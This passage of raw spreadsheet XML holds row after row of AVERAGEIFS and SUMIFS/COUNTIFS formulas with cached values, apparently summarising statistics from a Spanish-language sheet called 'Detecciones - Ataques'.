        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DH$3:$DH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BZ$131)
</f>
        <v>0.162601626</v>
      </c>
      <c r="CA157" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CB157" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CC157" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CD157" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CE157" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CF157" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DH$3:$DH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CF$131)
</f>
        <v>4</v>
      </c>
      <c r="CG157" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CH157" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DH$3:$DH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CH$131)
</f>
        <v>1</v>
      </c>
      <c r="CI157" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DH$3:$DH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CI$131)
</f>
        <v>0</v>
      </c>
      <c r="CJ157" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CK157" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DH$3:$DH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CK$131)
</f>
        <v>13</v>
      </c>
      <c r="CL157" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CM157" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DH$3:$DH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CM$131)
</f>
        <v>81</v>
      </c>
      <c r="CN157" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DH$3:$DH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CN$131)
</f>
        <v>0</v>
      </c>
      <c r="CO157" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DH$3:$DH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CO$131)
</f>
        <v>0.5</v>
      </c>
      <c r="CP157" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DH$3:$DH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CP$131)
</f>
        <v>20</v>
      </c>
      <c r="CQ157" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DH$3:$DH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CQ$131)
</f>
        <v>3</v>
      </c>
      <c r="CR157" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CS157" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CT157" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DH$3:$DH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CT$131)
</f>
        <v>0.007984031936</v>
      </c>
      <c r="CU157" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CV157" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DH$3:$DH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CV$131)
</f>
        <v>0</v>
      </c>
      <c r="CW157" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CX157" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DH$3:$DH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CX$131)
</f>
        <v>5.5</v>
      </c>
      <c r="CY157" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DH$3:$DH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CY$131)
</f>
        <v>1.5</v>
      </c>
      <c r="CZ157" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DA157" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DB157" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DC157" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DD157" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DE157" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DF157" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DG157" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DH157" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DH$3:$DH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DH$131)
</f>
        <v>1.053333333</v>
      </c>
      <c r="DI157" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DJ157" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DH$3:$DH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DJ$131)
</f>
        <v>1.363636364</v>
      </c>
      <c r="DK157" s="271"/>
    </row>
    <row r="158">
      <c r="J158" s="277"/>
      <c r="K158" s="512"/>
      <c r="L158" s="512"/>
      <c r="M158" s="512"/>
      <c r="N158" s="512"/>
      <c r="O158" s="278"/>
      <c r="Q158" s="271"/>
      <c r="R158" s="352" t="s">
        <v>2580</v>
      </c>
      <c r="S158" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EX$3:$EX$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EX$3:$EX$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
)
</f>
        <v>0.8359223301</v>
      </c>
      <c r="T158" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EX$3:$EX$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EX$3:$EX$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="U158" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EX$3:$EX$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EX$3:$EX$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
)
</f>
        <v>10.83859649</v>
      </c>
      <c r="V158" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EX$3:$EX$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EX$3:$EX$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
)
</f>
        <v>9.34375</v>
      </c>
      <c r="W158" s="532">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EX$3:$EX$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EX$3:$EX$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
)
</f>
        <v>26</v>
      </c>
      <c r="X158" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EX$3:$EX$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EX$3:$EX$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
)
</f>
        <v>1.285714286</v>
      </c>
      <c r="Y158" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EX$3:$EX$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EX$3:$EX$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
)
</f>
        <v>161.05</v>
      </c>
      <c r="Z158" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EX$3:$EX$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EX$3:$EX$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
)
</f>
        <v>247532.1962</v>
      </c>
      <c r="AA158" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EX$3:$EX$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EX$3:$EX$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
)
</f>
        <v>2.621781076</v>
      </c>
      <c r="AB158" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EX$3:$EX$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EX$3:$EX$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
)
</f>
        <v>29.171875</v>
      </c>
      <c r="AC158" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EX$3:$EX$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EX$3:$EX$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
)
</f>
        <v>6.65</v>
      </c>
      <c r="AD158" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EX$3:$EX$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EX$3:$EX$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
)
</f>
        <v>2.001596806</v>
      </c>
      <c r="AE158" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EX$3:$EX$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EX$3:$EX$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
)
</f>
        <v>2.68</v>
      </c>
      <c r="AF158" s="502">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EX$3:$EX$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EX$3:$EX$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
)
</f>
        <v>7.197929293</v>
      </c>
      <c r="AG158" s="271"/>
      <c r="AH158" s="352" t="s">
        <v>2580</v>
      </c>
      <c r="AI158" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EX$3:$EX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AI$131)
</f>
        <v>0.01553398058</v>
      </c>
      <c r="AJ158" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EX$3:$EX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AJ$131)
</f>
        <v>1</v>
      </c>
      <c r="AK158" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EX$3:$EX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AK$131)
</f>
        <v>4</v>
      </c>
      <c r="AL158" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EX$3:$EX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AL$131)
</f>
        <v>0</v>
      </c>
      <c r="AM158" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AN158" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO158" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP158" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ158" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EX$3:$EX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AQ$131)
</f>
        <v>2.210526316</v>
      </c>
      <c r="AR158" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EX$3:$EX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AR$131)
</f>
        <v>42.66666667</v>
      </c>
      <c r="AS158" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT158" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EX$3:$EX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AT$131)
</f>
        <v>4</v>
      </c>
      <c r="AU158" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EX$3:$EX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AU$131)
</f>
        <v>6</v>
      </c>
      <c r="AV158" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EX$3:$EX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AV$131)
</f>
        <v>2</v>
      </c>
      <c r="AW158" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AX158" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EX$3:$EX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AX$131)
</f>
        <v>3.375</v>
      </c>
      <c r="AY158" s="534" t="s">
        <v>12</v>
      </c>
      <c r="AZ158" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EX$3:$EX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AZ$131)
</f>
        <v>4</v>
      </c>
      <c r="BA158" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EX$3:$EX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BA$131)
</f>
        <v>26</v>
      </c>
      <c r="BB158" s="534" t="s">
        <v>12</v>
      </c>
      <c r="BC158" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EX$3:$EX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BC$131)
</f>
        <v>0.5</v>
      </c>
      <c r="BD158" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BE158" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EX$3:$EX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BE$131)
</f>
        <v>4</v>
      </c>
      <c r="BF158" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EX$3:$EX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BF$131)
</f>
        <v>1.5</v>
      </c>
      <c r="BG158" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EX$3:$EX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BG$131)
</f>
        <v>1</v>
      </c>
      <c r="BH158" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EX$3:$EX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BH$131)
</f>
        <v>792</v>
      </c>
      <c r="BI158" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BJ158" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BK158" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BL158" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EX$3:$EX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BL$131)
</f>
        <v>2</v>
      </c>
      <c r="BM158" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EX$3:$EX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BM$131)
</f>
        <v>361999.2593</v>
      </c>
      <c r="BN158" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EX$3:$EX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BN$131)
</f>
        <v>135389.6417</v>
      </c>
      <c r="BO158" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BP158" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BQ158" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EX$3:$EX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BQ$131)
</f>
        <v>1.004901961</v>
      </c>
      <c r="BR158" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BS158" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EX$3:$EX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BS$131)
</f>
        <v>6.5</v>
      </c>
      <c r="BT158" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BU158" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BV158" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EX$3:$EX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BV$131)
</f>
        <v>0</v>
      </c>
      <c r="BW158" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EX$3:$EX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BW$131)
</f>
        <v>4</v>
      </c>
      <c r="BX158" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BY158" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EX$3:$EX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BY$131)
</f>
        <v>2.6875</v>
      </c>
      <c r="BZ158" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EX$3:$EX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BZ$131)
</f>
        <v>2.203252033</v>
      </c>
      <c r="CA158" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CB158" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CC158" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CD158" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CE158" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CF158" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EX$3:$EX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CF$131)
</f>
        <v>5</v>
      </c>
      <c r="CG158" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CH158" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EX$3:$EX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CH$131)
</f>
        <v>6</v>
      </c>
      <c r="CI158" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EX$3:$EX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CI$131)
</f>
        <v>34</v>
      </c>
      <c r="CJ158" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CK158" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EX$3:$EX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CK$131)
</f>
        <v>19</v>
      </c>
      <c r="CL158" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CM158" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EX$3:$EX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CM$131)
</f>
        <v>85.5</v>
      </c>
      <c r="CN158" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EX$3:$EX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CN$131)
</f>
        <v>0</v>
      </c>
